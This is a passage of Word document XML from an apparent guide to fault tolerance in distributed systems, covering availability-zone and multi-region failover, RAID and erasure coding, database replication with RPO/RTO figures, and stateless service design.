    <w:p w14:paraId="26ED9792" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│                     Region: us-east-1                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC93EF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│                                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4023EDC6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  ┌──────────┐    ┌──────────┐    ┌──────────┐     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D659661" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  │  AZ-1a   │    │  AZ-1b   │    │  AZ-1c   │     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D46CBB8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  │          │    │          │    │          │     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200252CC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  │ App (3)  │    │ App (3)  │    │ App (3)  │     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F26D1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  │ DB Prim  │    │ DB Repl  │    │ DB Repl  │     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF0D712" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  │ Cache    │    │ Cache    │    │ Cache    │     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0577C1C2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>│  └──────────┘    └──────────┘    └──────────┘     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E50D876" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>└─────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D0E6B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="646EF9C2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>AZ-1a fails entirely (power outage):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10706DFB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  → App traffic shifts to AZ-1b and AZ-1c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4437FC3E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  → DB replica in AZ-1b promoted to primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D4A9FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  → Cache rebuilt from DB (or second replica already warm).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238A5C74" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  → Service continues with 2/3 capacity (auto-scales to compensate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E098631" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Multi-Region</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6DB42F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A63342" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>For surviving entire region failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1009500F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="50510446" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>┌──────────────┐         ┌──────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1DCD71" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  us-east-1   │</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  eu-west-1   </w:t>
      </w:r>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455F43FD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│  (Primary)   │  async   │  (Secondary) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C015E0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│              │  repl    │              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1431D4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Read + Write │         │ Read-only    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C86ACD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>└──────────────┘         └──────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6440A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="115D205B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Region failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAF0C0A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  us-east-1 goes down entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226DB254" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  DNS/routing updated to point to eu-west-1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655EFA0F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  eu-west-1 promoted to primary (accepts writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ABFE79" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E2672" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  RPO: replication lag (seconds — async cross-region).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D25CFFD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  RTO: minutes (DNS propagation + promotion).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA8D806" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.3 Redundancy in Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E746A72" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RAID (single machine):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43247274" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68479A37" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>RAID 1 (mirroring): 2 copies on 2 disks. 1 disk fails → other serves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF41429" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>RAID 5 (parity): N+1 disks, 1 parity. 1 disk fails → reconstruct from parity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B63D1D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>RAID 6 (double parity): N+2 disks. 2 disk failures tolerated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655361AB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>RAID 10 (mirror + stripe): Mirror pairs → stripe across pairs. High performance + redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD6B8AF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Erasure coding (distributed storage):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A77EA11" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555B5582" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Split data into k data chunks + m parity chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEC3312" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Can tolerate any m chunk losses and reconstruct the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F700106" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="26E40199" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Example (Reed-Solomon, k=6, m=3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E09D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Data split into 6 chunks, 3 parity chunks calculated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6BA2D1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  9 chunks stored across 9 nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F520A7C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Any 3 nodes can fail → data still reconstructable from remaining 6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496919BA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600CD6E0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Storage overhead: 9/6 = 1.5x (vs. 3x for triple replication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C3533" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Used by: HDFS (erasure coding mode), Azure Storage, Google Colossus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB1DFF5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.4 Database Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E9B290" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78742230" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Single-region HA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A509083" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Primary (AZ-a) ←sync→ Standby (AZ-b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC4BBD9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Automatic failover (Patroni, RDS Multi-AZ): 30-60 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59672788" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  RPO: 0 (synchronous replication, no data loss).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656472FB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  RTO: 30-60 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599BFA92" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="4FE8A8C0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Multi-region DR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9EB54D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Primary (us-east-1) ──async→ Replica (eu-west-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029E25DD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Manual or automated failover: minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081F4F6D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  RPO: replication lag (100ms–seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3436CEA9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  RTO: minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A2ED7F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="467DF000" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Consensus-based (CockroachDB, Spanner):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686CFD79" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  3-5 replicas across AZs/regions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3845041E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Raft consensus per data range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABBC1B9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Automatic failover: seconds (Raft leader election).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2003B358" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  RPO: 0 (committed data on majority).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49040857" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  RTO: seconds (Raft election timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC0D57C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="0F24AD9D">
          <v:rect id="_x0000_i6350" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CAD4C2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Application-Level Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A50E0BC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 Stateless Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA3FFF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79060036" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>The most fault-tolerant application design: STATELESS services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76430B01" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="050A1B14" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Stateless: no in-process state that matters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD8F87" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Any instance can handle any request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56380FE6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Instance dies → other instances seamlessly serve its traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC6CD16" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Scaling: just add instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B6995C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Recovery: just start new instance (nothing to restore).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20264C7E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="78515117" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Where state goes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A0DEF5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Database (durable, replicated).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509643BB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Cache (Redis — shared across instances).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB137E6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Session store (Redis/DynamoDB — not in server memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBA39AA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Object storage (S3 — for files/blobs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F42F0B2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="5618B082" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Stateful services (harder):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C384EE2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Must maintain state across failures (replication, checkpointing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6736FDE7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Scaling requires partitioning state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B783E6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Recovery requires state restoration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724BE77E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Examples: databases, stream processors, game servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FCBDEA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Idempotent Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0E9EA3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE8AAE1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
